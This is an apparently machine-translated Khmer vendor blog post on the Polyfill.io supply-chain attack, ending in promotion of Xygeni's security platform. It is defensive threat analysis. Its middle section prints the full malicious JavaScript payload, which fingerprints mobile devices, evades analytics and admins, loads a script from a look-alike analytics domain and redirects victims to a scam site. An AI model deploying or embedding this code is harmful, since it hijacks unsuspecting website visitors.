ការវាយប្រហារ Polyfill-ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill-ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ផ្នែកទន់

ការលាតត្រដាង Polyfill៖ ការសិក្សាស៊ីជម្រៅ

នៅខែកុម្ភៈ 2024, នេះ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill.io- ឧទាហរណ៍ដ៏សំខាន់មួយនៃ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី—បាន​ធ្វើ​ឲ្យ​គេហទំព័រ​ជាង 100,000 កន្លែង​រង​ការ​វាយប្រហារ​ទូទាំង​ពិភពលោក។ ហេតុការណ៍​នេះ​ពាក់ព័ន្ធ​នឹង ការលួចយកកញ្ចប់ជាកន្លែងដែល FUNNULL ដែលជាអង្គភាពព្យាបាទ ទទួលបានការគ្រប់គ្រងលើដែន និងឃ្លាំង GitHub របស់ Polyfill ដោយចាក់មេរោគចូលទៅក្នុងសេវាកម្ម។ មេរោគនេះកំណត់គោលដៅជាពិសេសលើអ្នកប្រើប្រាស់ទូរស័ព្ទចល័ត ដោយបញ្ជូនពួកគេទៅកាន់គេហទំព័រល្បែងស៊ីសងក្លែងក្លាយដោយកេងប្រវ័ញ្ចភាពងាយរងគ្រោះនៅក្នុងការចែកចាយលេខកូដថាមវន្តរបស់ Polyfill ដោយផ្អែកលើបឋមកថា HTTP និងភ្នាក់ងារអ្នកប្រើប្រាស់។

ការវិភាគបច្ចេកទេស៖ របៀបដែលការវាយប្រហារ Polyfill ដំណើរការ

Polyfill ត្រូវបានគេប្រើប្រាស់យ៉ាងទូលំទូលាយ ដើម្បីធានាបាននូវភាពឆបគ្នារវាងមុខងារគេហទំព័រទំនើបៗ និងកម្មវិធីរុករកចាស់ៗ។ អ្នកវាយប្រហារបានប្រើ ការលួចយកកញ្ចប់ ដោយ​ការ​ទិញ​ cdn.polyfill.io ដែន និងការបង្កប់ស្គ្រីបព្យាបាទ។ អ្វីដែលធ្វើឱ្យការវាយប្រហារនេះមានគ្រោះថ្នាក់ខ្លាំងគឺឥរិយាបថដ៏ស្មុគស្មាញរបស់មេរោគ៖

  • ការបង្កើតកូដថាមវន្តសេវាកម្មរបស់ Polyfill បានបង្កើតការឆ្លើយតប JavaScript ផ្ទាល់ខ្លួនដោយផ្អែកលើឧបករណ៍ដែលចូលប្រើគេហទំព័រ (ឧទាហរណ៍ ទូរស័ព្ទចល័តទល់នឹងកុំព្យូទ័រលើតុ) បឋមកថា HTTP និងភ្នាក់ងារអ្នកប្រើប្រាស់។ អ្នកវាយប្រហារបានកេងចំណេញពីលក្ខណៈថាមវន្តនេះ ដោយចាក់បញ្ចូលបន្ទុកមេរោគដែលត្រូវបានរចនាឡើងសម្រាប់ឧបករណ៍ជាក់លាក់ - ជាពិសេសទូរស័ព្ទចល័ត។
  • បច្ចេកទេសគេចវេសមេរោគ​នេះ​ឆ្លាត​ណាស់។ វា​បាន​ពន្យារ​ពេល​ប្រតិបត្តិការ​នៅពេល​ដែល​សេវាកម្ម​វិភាគ​ដូចជា Google Analytics ត្រូវ​បាន​រកឃើញ ដែល​រារាំង​សកម្មភាព​របស់​វា​ពី​ការ​បង្ហាញ​ក្នុង​ស្ថិតិ​គេហទំព័រ។ លើស​ពី​នេះ វា​មិន​បាន​ធ្វើ​ឱ្យ​សកម្ម​ទេ ប្រសិនបើ​អ្នក​ប្រើប្រាស់​ជា​អ្នកគ្រប់គ្រង ឬ​អ្នកអភិវឌ្ឍន៍​ត្រូវ​បាន​រកឃើញ ដែល​ជៀសវាង​ការ​រក​ឃើញ​មុន​ក្នុង​អំឡុង​ពេល​បំបាត់​កំហុស ឬ​ការ​សាកល្បង។
  • ការបញ្ជូនបន្តតាមទូរស័ព្ទចល័តនៅពេលដែលបានធ្វើឱ្យសកម្ម មេរោគបានបញ្ជូនអ្នកប្រើប្រាស់ទៅកាន់គេហទំព័រល្បែងស៊ីសងក្លែងក្លាយដោយក្លែងបន្លំជាដូមេនស្របច្បាប់ (ឧ. googie-anaiytics.com)។ អ្នកវាយប្រហារថែមទាំងបានរៀបចំបង្អួចពេលវេលាដើម្បីកាត់បន្ថយការសង្ស័យ ដោយប្រតិបត្តិបន្ទុកទិន្នន័យតែក្នុងអំឡុងពេលជាក់លាក់មួយចំនួនប៉ុណ្ណោះ ដើម្បីចាប់អ្នកប្រើប្រាស់ទូរស័ព្ទចល័តដែលមិនបានសង្ស័យឲ្យភ្ញាក់។

គេហទំព័រធំៗបំផុតរងការវាយប្រហារដោយ Polyfill

ចំពោះ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill បានប៉ះពាល់ដល់គេហទំព័រជាង 100,000 រួមទាំងអង្គការធំៗដូចជា៖

  • វេទិកាសេដ្ឋកិច្ចពិភពលោក
  • វិចារណញាណ
  • JSTOR
  • ធនាគារអៀរឡង់
  • ធនាគារិក Coldwell
  • ជាតិផ្សាយផ្ទាល់។
  • សាកលវិទ្យាល័យ Brandeis
  • ក្រុមហ៊ុនអាកាសយានដ្ឋានឌូបៃ
  • មូលនិធិការពារបរិស្ថាន

ជនរងគ្រោះល្បីៗទាំងនេះ គូសបញ្ជាក់ពីវិសាលភាពសកលនៃការវាយប្រហារ និងភាពងាយរងគ្រោះរបស់ ស្ថាប័នធំៗចំពោះការបំពានខ្សែសង្វាក់ផ្គត់ផ្គង់

ការព្រមាន និងការឆ្លើយតបដំបូង

អាន់ឌ្រូ ប៊ែតស៍ដែលជាអ្នកបង្កើតដើមរបស់ Polyfill បានព្រមានអ្នកអភិវឌ្ឍន៍ជាច្រើនខែមុនការវាយប្រហារនេះថា ឈប់ប្រើប្រាស់សេវាកម្ម Polyfill បន្ទាប់ពីគាត់បានបាត់បង់ការគ្រប់គ្រងលើដែន។ ការព្រមានរបស់គាត់ភាគច្រើនមិនត្រូវបានគេយកចិត្តទុកដាក់រហូតដល់ការវាយប្រហាររបស់ FUNNULL បានចាប់ផ្តើម។ នៅពេលដែលត្រូវបានរកឃើញ បណ្តាញចែកចាយខ្លឹមសារដូចជា Cloudflare និង Fastly បានផ្តល់ជម្រើសដែលមានសុវត្ថិភាព ខណៈពេលដែល Betts បានបញ្ជាក់ជាថ្មីនូវដំបូន្មានរបស់គាត់សម្រាប់អ្នកអភិវឌ្ឍន៍ឱ្យលុបឯកសារយោង Polyfill ទាំងស្រុង។

ឧទាហរណ៍នៃបន្ទុកផ្ទុកមេរោគ Polyfill

ដើម្បីបង្ហាញពីភាពស្មុគស្មាញនៃការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill សាន់សេ បានផ្តល់ឧទាហរណ៍លម្អិតនៃ payload ដែលមានគំនិតអាក្រក់ដែលបានប្រើ។ payload នេះបានសម្របខ្លួនដោយថាមវន្តដោយផ្អែកលើឧបករណ៍របស់អ្នកប្រើប្រាស់ ដោយបង្កឱ្យមានការបញ្ជូនបន្តទៅកាន់គេហទំព័រក្លែងបន្លំ និងប្រើប្រាស់បច្ចេកទេសដើម្បីគេចពីការរកឃើញ។ ដើម្បីមើលឱ្យកាន់តែច្បាស់អំពីការវិភាគបច្ចេកទេសនៃ payload នេះ អ្នកអាចពិនិត្យមើល សាន់សេក ការវិភាគពេញលេញ និងគំរូកូដព្យាបាទ។

				
					function isPc() {
  try {
    var _isWin =
        navigator.platform == "Win32" || navigator.platform == "Windows",
      _isMac =
        navigator.platform == "Mac68K" ||
        navigator.platform == "MacPPC" ||
        navigator.platform == "Macintosh" ||
        navigator.platform == "MacIntel";
    if (_isMac || _isWin) {
      return true;
    } else {
      return false;
    }
  } catch (_0x44e1f6) {
    return false;
  }
}
function vfed_update(_0x5ae1f8) {
  _0x5ae1f8 !== "" &&
    loadJS(
      "https://www.googie-anaiytics.com/html/checkcachehw.js",
      function () {
        if (usercache == true) {
          window.location.href = _0x5ae1f8;
        }
      }
    );
}
function check_tiaozhuan() {
  var _isMobile = navigator.userAgent.match(
    /(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
  );
  if (_isMobile) {
    var _curHost = window.location.host,
      _ref = document.referrer,
      _redirectURL = "",
      _kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
      _rnd = Math.floor(Math.random() * 100 + 1),
      _date = new Date(),
      _hours = _date.getHours();
    if (
      _curHost.indexOf("www.dxtv1.com") !== -1 ||
      _curHost.indexOf("www.ys752.com") !== -1
    ) {
      _redirectURL = "https://kuurza.com/redirect?from=bitget";
    } else {
      if (_curHost.indexOf("shuanshu.com.com") !== -1) {
        _redirectURL = "https://kuurza.com/redirect?from=bitget";
      } else {
        if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
          _redirectURL = "https://kuurza.com/redirect?from=bitget";
        } else {
          if (_hours >= 0 && _hours < 2) {
            if (_rnd <= 10) {
              _redirectURL = _kuurzaBitGet;
            }
          } else {
            if (_hours >= 2 && _hours < 4) {
              _rnd <= 15 && (_redirectURL = _kuurzaBitGet);
            } else {
              if (_hours >= 4 && _hours < 7) {
                _rnd <= 20 && (_redirectURL = _kuurzaBitGet);
              } else {
                _hours >= 7 && _hours < 8
                  ? _rnd <= 10 && (_redirectURL = _kuurzaBitGet)
                  : _rnd <= 10 && (_redirectURL = _kuurzaBitGet);
              }
            }
          }
        }
      }
    }
    _redirectURL != "" &&
      !isPc() &&
      document.cookie.indexOf("admin_id") == -1 &&
      document.cookie.indexOf("adminlevels") == -1 &&
      vfed_update(_redirectURL);
  }
}
let _outerPage = document.documentElement.outerHTML,
  bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
  wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
  aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
  aplausix = _outerPage.indexOf(".plausible.io") != -1,
  statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
  ? setTimeout(check_tiaozhuan, 2000)
  : check_tiaozhuan();
				
			

ហេតុអ្វីបានជាការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill កើតឡើង?

ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill គូសបញ្ជាក់ពីភាពសំខាន់ ភាពងាយរងគ្រោះនៅក្នុងការពឹងផ្អែករបស់ភាគីទីបី ការគ្រប់គ្រង។ ប្រព័ន្ធអេកូឡូស៊ី JavaScript ទំនើបពឹងផ្អែកយ៉ាងខ្លាំងទៅលើបណ្ណាល័យប្រភពបើកចំហ ហើយអ្នកអភិវឌ្ឍន៍ច្រើនតែប្រើឧបករណ៍ដូចជា npm ដើម្បីរួមបញ្ចូលបណ្ណាល័យទាំងនេះដោយស្វ័យប្រវត្តិ។ បើគ្មានការធ្វើសវនកម្មយ៉ាងម៉ត់ចត់ ឬការត្រួតពិនិត្យជាបន្តបន្ទាប់ទេ កញ្ចប់ដែលរងការសម្របសម្រួលអាចរអិលចេញដោយមិនអាចរកឃើញ ដូចដែលបានឃើញជាមួយ Polyfill។

លើសពីនេះ ល្បឿននៃការអភិវឌ្ឍ និងការដាក់ពង្រាយយ៉ាងឆាប់រហ័សនៅក្នុងបរិយាកាសកម្មវិធីសព្វថ្ងៃនេះ ជារឿយៗផ្តល់អាទិភាពដល់មុខងារ និងល្បឿនលើសពីការត្រួតពិនិត្យសុវត្ថិភាពយ៉ាងហ្មត់ចត់។ អ្នកវាយប្រហារទាញយកប្រយោជន៍ពីចន្លោះប្រហោងនេះ ដោយកំណត់គោលដៅបណ្ណាល័យពេញនិយមដើម្បីបង្កើនផលប៉ះពាល់របស់ពួកគេ។ ក្នុងករណី Polyfill នៅពេលដែលអ្នកវាយប្រហារទទួលបានការគ្រប់គ្រងលើដែន ពួកគេបានទាញយកអត្ថប្រយោជន៍ពីការប្រើប្រាស់យ៉ាងទូលំទូលាយរបស់បណ្ណាល័យ ដើម្បីចាក់កូដព្យាបាទនៅទូទាំងគេហទំព័រមួយចំនួនធំ។

ឧប្បត្តិហេតុនេះបង្ហាញពីសារៈសំខាន់នៃការអនុវត្តវិធានការសន្តិសុខដ៏តឹងរ៉ឹង ដូចជាឧបករណ៍សវនកម្មភាពអាស្រ័យ ការត្រួតពិនិត្យពេលវេលាជាក់ស្តែង និងផែនការឆ្លើយតបឧប្បត្តិហេតុដ៏រឹងមាំ ដើម្បីការពារប្រឆាំងនឹងការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីស្រដៀងគ្នា។ អង្គការនានាត្រូវតែផ្តល់អាទិភាពដល់សុវត្ថិភាពនៅក្នុងលំហូរការងារអភិវឌ្ឍន៍របស់ពួកគេ ដើម្បីការពារប្រព័ន្ធអេកូឡូស៊ីឌីជីថលរបស់ពួកគេប្រកបដោយប្រសិទ្ធភាព។

ការទប់ស្កាត់ការវាយប្រហារនាពេលអនាគត៖ ការគ្រប់គ្រងការពឹងផ្អែកដ៏រឹងមាំ

នៅពេលគ្រប់គ្រងភាពអាស្រ័យ ស៊ីហ្គេនី Open Source Security វេទិកា ប្រើស្រទាប់ការពារច្រើនស្រទាប់ ដែលត្រូវបានរចនាឡើងដើម្បីរកឃើញ ធ្វើឱ្យនៅដាច់ដោយឡែក និងជួសជុលសមាសធាតុព្យាបាទក្នុងពេលវេលាជាក់ស្តែង និងជៀសវាងការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។

ការរកឃើញមេរោគតាមពេលវេលាជាក់ស្តែង៖ Xygeni តាមដានការចុះឈ្មោះសាធារណៈជាបន្តបន្ទាប់ ដោយស្កេនរកលេខកូដគួរឱ្យសង្ស័យមុនពេលវាចូលទៅក្នុងបរិយាកាសអភិវឌ្ឍន៍។ នេះអនុញ្ញាតឱ្យមានការទប់ស្កាត់ការគំរាមកំហែងដូចជាការវាយប្រហារ Polyfill ដូចដែលបានគូសបញ្ជាក់នៅក្នុង របស់ ល្វីស រ៉ូឌ្រីហ្គេស ស៊េរីអត្ថបទ។ 

ការជូនដំណឹងដោយស្វ័យប្រវត្តិ និងការដាក់ឱ្យនៅដាច់ដោយឡែក៖ Xygeni ញែកកញ្ចប់ដែលរងការសម្របសម្រួលដោយស្វ័យប្រវត្តិ និងបង្កើតការជូនដំណឹង ដែលអនុញ្ញាតឱ្យក្រុមអភិវឌ្ឍន៍ធ្វើសកម្មភាពបានយ៉ាងឆាប់រហ័ស។ ដោយការរួមបញ្ចូលជាមួយ CI/CD pipelineការគំរាមកំហែងណាមួយអាចត្រូវបានបញ្ឈប់មុនពេលវាឈានដល់ការផលិត។ ក្នុងករណីដូចជាឧប្បត្តិហេតុ Polyfill មុខងារនេះការពារផលប៉ះពាល់យ៉ាងទូលំទូលាយដោយការបញ្ឈប់កូដព្យាបាទតាំងពីដំបូង។

ការផ្តល់អាទិភាពថាមវន្ត & SBOM៖ Xygeni ផ្តល់អាទិភាពដល់ភាពងាយរងគ្រោះដោយផ្អែកលើបរិបទ ភាពងាយរងគ្រោះ និងផលប៉ះពាល់អាជីវកម្ម។ ដោយបង្កើត វិក្កយបត្រសម្ភារៈកម្មវិធីពេលវេលាជាក់ស្តែង (SBOM)អង្គការនានាអាចតាមដានសមាសធាតុភាគីទីបីទាំងអស់ ដោយធានាបាននូវតម្លាភាពពេញលេញ។ ការត្រួតពិនិត្យពេលវេលាជាក់ស្តែងនេះគឺមានសារៈសំខាន់នៅពេលគ្រប់គ្រងការពឹងផ្អែកប្រភពបើកចំហ ដែលអនុញ្ញាតឱ្យមានការឆ្លើយតបយ៉ាងរហ័សចំពោះឧប្បត្តិហេតុដូចជាការលួចចូលប្រព័ន្ធរបស់ Polyfill។

នៅក្នុងស៊េរីអត្ថបទដោយ Luis Rodriguez, ផ្តោតលើ ការការពារសកម្ម ប្រឆាំងនឹងកញ្ចប់ប្រភពបើកចំហដែលមានគំនិតអាក្រក់ត្រូវបានពិភាក្សាលម្អិត។ វិធីសាស្រ្តរបស់ Xygeni មិនត្រឹមតែគ្របដណ្តប់លើការរកឃើញពេលវេលាជាក់ស្តែងប៉ុណ្ណោះទេ ប៉ុន្តែថែមទាំងផ្តល់នូវផ្លូវជួសជុលដោយស្វ័យប្រវត្តិផងដែរ ដែលអនុញ្ញាតឱ្យអង្គការនានាត្រលប់ទៅកំណែសុវត្ថិភាពវិញដោយមិនរំខានដល់ផលិតកម្ម។

ពិនិត្យ​មុន​ពេល​ចេញ កញ្ចប់ព្យាបាទប្រភពបើកចំហ ស៊េរីអត្ថបទនៅទីនេះ ដើម្បីស្វែងយល់បន្ថែមអំពីរបៀបដែល Xygeni គ្រប់គ្រងសុវត្ថិភាពប្រភពបើកចំហ។

ការពារការពឹងផ្អែកប្រភពបើកចំហរបស់អ្នកពីមេរោគ

ស្វែងយល់ពីយុទ្ធសាស្ត្រសកម្មដើម្បីការពារកម្មវិធីប្រភពបើកចំហរបស់អ្នកពីការគំរាមកំហែងពីមេរោគ។ ទាញយកឯកសារសរបស់យើងសម្រាប់ការយល់ដឹងសំខាន់ៗអំពីការការពារមេរោគ។

មេរៀនពីការវាយប្រហារ Polyfill

ចំពោះ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill.io បង្រៀនមេរៀនសំខាន់ៗអំពីហានិភ័យនៃការពឹងផ្អែករបស់ភាគីទីបីក្នុងការអភិវឌ្ឍគេហទំព័រទំនើប។

  • ការប្រុងប្រយ័ត្នក្នុងការពឹងផ្អែករបស់ភាគីទីបីនេះ​ជា​ចំណុច​សំខាន់​បំផុត។ អង្គការ​នានា​ត្រូវតែ ពិនិត្យ ពិនិត្យ និងតាមដានជាប្រចាំ បណ្ណាល័យភាគីទីបីទាំងអស់ដែលពួកគេប្រើប្រាស់។ ការពឹងផ្អែកខ្លាំងពេកលើការពឹងផ្អែកដែលមិនបានត្រួតពិនិត្យអាចធ្វើឱ្យប្រព័ន្ធប្រឈមនឹងហានិភ័យធ្ងន់ធ្ងរ។
  • វិធានការសន្តិសុខសកម្ម: ការត្រួតពិនិត្យជាបន្តបន្ទាប់ ដូចជាជាមួយ ការរកឃើញការគំរាមកំហែងតាមពេលវេលាជាក់ស្តែងរបស់ Xygeniអាចរកឃើញចំណុចខ្សោយបានទាន់ពេលវេលា។
  • អប់រំនិងបណ្តុះបណ្តាលការ​ធ្វើ​ឲ្យ​សមាជិក​ក្រុម​ទាំងអស់​ទទួល​បាន​ព័ត៌មាន​ថ្មីៗ​អំពី​ការ​គំរាមកំហែង​ថ្មីៗ​បំផុត​ជួយ​ពង្រឹង​សុវត្ថិភាព​របស់​អង្គការ។

ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់ Polyfill បម្រើជាការរំលឹកដ៏មានឥទ្ធិពលមួយអំពីការគំរាមកំហែងដែលកំពុងកើនឡើងដែលបង្កឡើងដោយ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីការវាយប្រហារទាំងនេះទាញយកប្រយោជន៍ពីភាពងាយរងគ្រោះនៅក្នុងសមាសធាតុភាគីទីបីដែលប្រើប្រាស់យ៉ាងទូលំទូលាយ ដែលធ្វើឱ្យអង្គការគ្រប់ទំហំងាយរងគ្រោះ។ តាមរយៈការអនុម័តវិធានការសុវត្ថិភាពជាមុន ដូចជា ការត្រួតពិនិត្យពេលវេលាពិតប្រាកដ, ការរកឃើញការគំរាមកំហែងដោយស្វ័យប្រវត្តិនិង ការគ្រប់គ្រងការពឹងផ្អែកដ៏រឹងមាំ—ដូចជាក្រុមហ៊ុនដែលផ្តល់ជូនដោយ Xygeni — ក្រុមហ៊ុននានាអាចការពារខ្លួនពីការគំរាមកំហែងស្រដៀងគ្នានេះនាពេលអនាគត។ ការប្រុងប្រយ័ត្នខ្ពស់ និងការរក្សាការត្រួតពិនិត្យយ៉ាងទូលំទូលាយលើបណ្ណាល័យភាគីទីបី គឺជាគន្លឹះក្នុងការទប់ស្កាត់ការសម្របសម្រួលទ្រង់ទ្រាយធំដូចជា Polyfill។

ធានាសុវត្ថិភាពការពឹងផ្អែកប្រភពបើកចំហរបស់អ្នកពីការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី

កុំ​ឲ្យ​កម្មវិធី​របស់​អ្នក​ក្លាយ​ជា​ជនរងគ្រោះ​នៃ​ការ​ ការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី ដូចជា Polyfill។ Xygeni's Open Source Security វេទិកា ផ្តល់ជូននូវការត្រួតពិនិត្យពេលវេលាជាក់ស្តែង ការធ្វើផែនទីការពឹងផ្អែកកម្រិតខ្ពស់ និងការកែតម្រូវដោយស្វ័យប្រវត្តិ ដើម្បីការពារការអភិវឌ្ឍន៍របស់អ្នក។ pipelineពីកញ្ចប់ដែលរងការសម្របសម្រួល។

គ្រប់គ្រងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីរបស់អ្នកនៅថ្ងៃនេះ។ រក្សាទុកការបង្ហាញ និងមើលពីរបៀបដែល Xygeni អាចការពារអង្គការរបស់អ្នកពីការគំរាមកំហែងនាពេលអនាគត។

ឧបករណ៍វិភាគសមាសភាពកម្មវិធី sca
ផ្តល់អាទិភាព ដោះស្រាយ និងធានាសុវត្ថិភាពហានិភ័យផ្នែកទន់របស់អ្នក
ទទួលបានគណនីឥតគិតថ្លៃរបស់អ្នក។
មិនតម្រូវឱ្យមានកាតឥណទានទេ។

ធានាសុវត្ថិភាពនៃការអភិវឌ្ឍន៍ និងការដឹកជញ្ជូនកម្មវិធីរបស់អ្នក

ជាមួយឈុតផលិតផល Xygeni